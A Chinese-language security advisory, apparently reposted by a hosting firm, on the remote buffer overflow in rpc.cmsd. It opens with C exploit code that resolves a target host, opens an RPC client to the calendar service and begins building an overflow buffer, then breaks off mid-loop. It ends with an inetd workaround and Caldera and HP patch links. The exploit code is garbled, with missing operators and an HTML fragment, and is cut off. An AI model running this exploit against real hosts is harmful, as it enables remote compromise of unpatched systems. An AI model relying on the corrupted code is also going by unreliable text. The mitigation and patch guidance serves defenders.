多家厂商rpc.cmsd远程缓冲区溢出漏洞

if (!xdr_Buffer(xdrs, &objp->target))
return (FALSE);
if (!xdr_Buffer(xdrs, &objp->new_target))
return (FALSE);
return (TRUE);
}

bool_t
xdr_Table_Status(xdrs, objp)
register XDR *xdrs;
Table_Status *objp;
{

register long *buf;

if (!xdr_enum(xdrs, (enum_t *)objp))
return (FALSE);
return (TRUE);
}

bool_t
xdr_Registration_Status(xdrs, objp)
register XDR *xdrs;
Registration_Status *objp;
{

register long *buf;

if (!xdr_enum(xdrs, (enum_t *)objp))
return (FALSE);
return (TRUE);
}

/*
* rtable_delete and rtable_change take over the functionality of
* rtable_delete_instance and rtable_change_instance repectively.
* rtable_delete_instance and rtable_change_instance are now dummy
* routines exist for backward compatibility purpose and return
* access_notsupported.
*/

extern Appt* make_appt();
extern void destroy_appt();
extern void destroy_list();
extern Appt *copy_appt();
extern Appt *copy_semiprivate_appt();
extern Abb_Appt *make_abbrev_appt();
extern void destroy_abbrev_appt();
extern Abb_Appt *copy_abbrev_appt();
extern Abb_Appt *appt_to_abbrev();
extern Abb_Appt *appt_to_semiprivate_abbrev();
extern Reminder* make_reminder();
extern void destroy_reminder();
extern Reminder* copy_reminder();
extern Uid* make_keyentry();
extern void destroy_keyentry();
extern Uid* copy_keyentry();
extern Access_Entry* make_access_entry();
extern Access_Entry* copy_access_list();
extern void destroy_access_list();
extern Abb_Appt *copy_single_abbrev_appt();
extern Attribute *make_attr();

/* ----- rpcgen ----- */

unsigned long resolve(char *host)
{
long i;
struct hostent *he;

if((i=inet_addr(host))==(-1))
if(!(he=gethostbyname(host)))
return(0);
else
return(*(unsigned long *)he->h_addr);

return(i);
}

int main(int argc, char *argv[])
{
char obuf[OFBUFSIZ 1], abuf[ALIGN 1];
struct sockaddr_in sin;
struct timeval tv;
Table_Op_Args toa;
Table_Status ts;
Table_Args ta;
Table_Res tr;
Appt ap;
int sock;
unsigned long *ptr;
CLIENT *c;

if(argc!=2)
{
(void)fprintf(stderr,"error: usage: %s <full hostname>\n",argv[0]);
exit(-1);
}

(void)memset(&sin,0,sizeof(sin));
sin.sin_family = AF_INET;

if(!(sin.sin_addr.s_addr=resolve(argv[1])))
{
(void)fprintf(stderr,"error: can not resolve: %s\n",argv[1]);
exit(-1);
}

(void)memset(&tv,0,sizeof(tv));
tv.tv_sec = 7;

sock = RPC_ANYSOCK;
if(!(c=(CLIENT *)clntudp_create(&sin,TABLEPROG,4,tv,&sock)))
{
(void)clnt_pcreateerror(argv[0]);
exit(1);
}
c->cl_auth = authunix_create(argv[1],0,0,0,0);

(void)memset(&toa,0,sizeof(toa));
toa.target = cname;

(void)memset(&ts,0,sizeof(ts));

if(clnt_call(c,rtable_create,xdr_Table_Op_Args,(caddr_t)&toa,
xdr_Table_Status,(caddr_t)&ts,tv)!=RPC_SUCCESS)
{
(void)clnt_perror(c,"error: rtable_create");
exit(-1);
}

(void)memset(abuf,0xff,sizeof(abuf));
abuf[sizeof(abuf)-1] = 0;

for(ptr=(unsigned long *)obuf;
&nbs

建议：

---

临时解决方法：

如果您不能立刻安装补丁或者升级，NSFOCUS建议您采取以下措施以降低威胁：

* NSFOCUS建议您立刻关闭rpc.cmsd服务。方法是在/etc/inetd.conf中注释掉下列行：
100068/2-5 dgram rpc/udp wait root /usr/dt/bin/rpc.cmsd rpc.cmsd
然后重新启动inetd.

厂商补丁：

Caldera
-------
Caldera已经为此发布了一个安全公告（CSSA-2002-SCO.12）以及相应补丁:
CSSA-2002-SCO.12：Open UNIX, UnixWare 7: rpc.cmsd can be remotely exploited
链接：ftp://stage.caldera.com/pub/security/openunix/CSSA-2002-SCO.12

补丁下载：

Caldera UnixWare 7.1.1:

Caldera Patch erg711942b.Z
ftp://stage.caldera.com/pub/security/openunix/CSSA-2002-SCO.12/

Caldera OpenUnix 8.0:

Caldera Patch erg711942b.Z
ftp://stage.caldera.com/pub/security/openunix/CSSA-2002-SCO.12/

HP
--
HP已经为此发布了一个安全公告（HPSBUX9908-102）以及相应补丁:
HPSBUX9908-102：Security Vulnerability in rpc.cmsd
链接：

文章整理：西部数码--专业提供域名注册、虚拟主机服务
http://www.west263.com
以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息，谢谢!